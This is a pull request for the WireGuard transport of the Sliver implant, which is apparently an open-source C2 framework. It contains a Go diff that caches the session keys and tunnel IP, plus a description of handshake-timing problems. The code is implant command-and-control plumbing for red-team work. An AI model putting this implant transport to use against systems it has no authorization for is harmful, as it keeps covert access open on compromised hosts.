### PR TITLE
Save implant Wireguard session keys

### DIFF
--- a/implant/sliver/transports/wireguard/wireguard.go
+++ b/implant/sliver/transports/wireguard/wireguard.go
@@ -59,6 +59,9 @@ var (
 	wgKeyExchangePort = getWgKeyExchangePort()
 	wgTcpCommsPort    = getWgTcpCommsPort()
 
+	wgSessPrivKey string
+	wgSessPubKey  string
+
 	PingInterval = 2 * time.Minute
 )
 
@@ -151,12 +154,11 @@ func ReadEnvelope(connection net.Conn) (*pb.Envelope, error) {
 	return envelope, nil
 }
 
-// WGConnect - Get a wg connection or die trying
-func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
-
+// getSessKeys - Connect to the wireguard server and retrieve session specific keys and IP
+func getSessKeys(address string, port uint16) error {
 	_, dev, tNet, err := bringUpWGInterface(address, port, wgImplantPrivKey, wgServerPubKey, wgPeerTunIP)
 	if err != nil {
-		return nil, nil, err
+		return err
 	}
 
 	dev.Up()
@@ -170,10 +172,10 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
 		// {{if .Config.Debug}}
 		log.Printf("Unable to connect to wg key exchange listener: %v", err)
 		// {{end}}
-		return nil, nil, err
+		return err
 	}
 
-	privKey, pubKey, newIP := doKeyExchange(keyExchangeConnection)
+	wgSessPrivKey, wgSessPubKey, tunAddress = doKeyExchange(keyExchangeConnection)
 
 	// {{if .Config.Debug}}
 	log.Printf("Signaling wg device to go down")
@@ -186,11 +188,19 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
 		// {{if .Config.Debug}}
 		log.Printf("Failed to close device.Device: %s", err)
 		// {{end}}
-		return nil, nil, err
+		return err
+	}
+	return nil
+}
+
+// WGConnect - Get a wg connection or die trying
+func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
+	if wgSessPrivKey == "" {
+		getSessKeys(address, port)
 	}
 
-	// Bring up second wireguard connection using retrieved keys and IP
-	_, dev, tNet, err = bringUpWGInterface(address, port, privKey, pubKey, newIP)
+	// Bring up actual wireguard connection using retrieved keys and IP
+	_, dev, tNet, err := bringUpWGInterface(address, port, wgSessPrivKey, wgSessPubKey, tunAddress)
 	if err != nil {
 		return nil, nil, err
 	}
@@ -207,7 +217,6 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
 	log.Printf("Successfully connected to sliver listener")
 	// {{end}}
 	tunnelNet = tNet
-	tunAddress = newIP
 	return connection, dev, nil
 }
 


### PR DESCRIPTION
#### Details
If the Wireguard implant is setup as a beacon it will connect using the implant private key at every beacon interval and request a new key.  It's like in The Highlander, there can be only one... session for each private key.  If someone had a large number of wg beacons connecting there's potential for multiples to be trying at one time.

This rabbit hole started when I noticed every Wireguard connection wasn't able to connect immediately and required a retransmit after 5 seconds.
```
DEBUG: [c2/wg] 2022/09/20 10:19:29 peer(mx2Q…5xAw) - Sending handshake initiation
DEBUG: [c2/wg] 2022/09/20 10:19:34 peer(mx2Q…5xAw) - Handshake did not complete after 5 seconds, retrying (try 2)
DEBUG: [c2/wg] 2022/09/20 10:19:34 peer(mx2Q…5xAw) - Sending handshake initiation
DEBUG: [c2/wg] 2022/09/20 10:19:35 peer(mx2Q…5xAw) - Received handshake response
```

The way the Wireguard transport is setup, server/c2/jobs.go->StartWGListenerJob() sets up a Ticker to fire every 5 seconds and if the count of WG peers is greater than before it reloads the config.  In all but the luckiest timing, this means it takes 0-5 seconds from when the new WG peer is added till it is actually available to connect.  I tried changing up the method of reloading the WG peers but the implant always tries to connect too quickly before the keys are loaded (unless there's only a small amount of peers).

This PR changes it so the session WG keys/IP is saved for the duration the implant is operational. 

I'm going to send an email about some other related issues.